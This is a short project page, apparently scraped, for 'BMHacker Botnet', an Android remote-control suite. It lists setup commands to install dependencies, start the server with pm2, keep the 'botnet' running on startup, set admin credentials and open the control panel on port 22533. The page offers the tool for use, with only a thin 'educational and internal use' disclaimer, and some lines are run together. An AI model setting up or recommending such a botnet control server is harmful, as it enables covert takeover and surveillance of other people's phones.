Projects by Hacking projects
A cloud based remote android managment suite, powered by NodeJS
sudo apt-get install openjdk-8-jre
su -c "yum install java-1.8.0-openjdk"
Install NodeJS Instructions Here (If you can’t figure this out, you shouldn’t really be using this)
npm install pm2 -g
Download and Extract HERE
npm install
<- install dependenciespm2 start index.js
<– start the scriptpm2 startup
<- to run botnet on startuppm2 stop index
maindb.json
in a text editoradmin
username
as plain textpassword
as a LOWERCASE MD5 hashpm2 restart all
http://<SERVER IP>:22533
It’s recommended to run botnet behind a reverse proxy such as NGINX
BMHacker Botnet Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool.
BMHacker Botnet is built for both Educational and Internal use ONLY.
Made By BM Hacker
v1.1.0
Inspired by L3MON (https://github.com/D3VL/L3MON)